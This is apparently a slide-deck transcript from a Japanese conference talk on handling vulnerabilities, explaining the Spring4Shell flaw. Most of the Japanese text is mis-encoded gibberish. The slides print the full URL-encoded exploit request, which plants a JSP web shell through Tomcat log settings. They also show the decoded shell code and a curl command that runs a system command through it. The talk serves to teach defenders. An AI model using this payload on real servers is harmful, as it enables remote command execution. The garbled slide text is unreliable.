Upgrade to Pro — share decks privately, control downloads, hide ads and more …

How To 脆弱性対応

cm-komuro
November 21, 2022

How To 脆弱性対応

DevelopersIO Sapporo 2022 の登壇資料です

cm-komuro

November 21, 2022
Tweet

More Decks by cm-komuro

Other Decks in Programming

Transcript

  1. ҎԼͷϦΫΤετΛղऍ͠Α͏ͱ͢Δ  wҎԼΛ#PEZʹؚΊͯ1045ͰϦΫΤετ w%BUB#JOEJOHͰ#JOEͰ͖ΔΫϥεΛ୳͢ class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2 %7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.get Parameter(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20wh ile((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))

    %3B%20%7D%20%7D%20%25%7Bsuffix%7Di &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp &class.module.classLoader.resources.context.parent.pipeline.first.directory=webap ps/ROOT &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwa r &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
  2. ࣮ߦ͞ΕΔͱԿ͕ى͖Δ͔  wϦΫΤετΛ࣮ߦ͢ΔͱϩάϑΝΠϧ͕+41ͱͳΔ wެ։͞ΕΔ %25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di %{c2}i

    if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1} i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i curl -X GET 'http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=whoami' XIPBNJ͕ग़ྗ͞ΕΔ
  3. #JOEJOHͰ$MBTT-PBEFS΁ΞΫηε  DMBTTNPEVMFDMBTT-PBEFS HFU$MBTT HFU.PEVMF HFU$MBTT-PBEFS class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20 if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream()

    %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di ͜ͷ$MBTT-PBEFS͕8FCBQQ$MBTT-PBEFSͩͱ Ҿ਺ͳ͠ͷHFU3FTPVSDFT ͕ଘࡏ͢Δ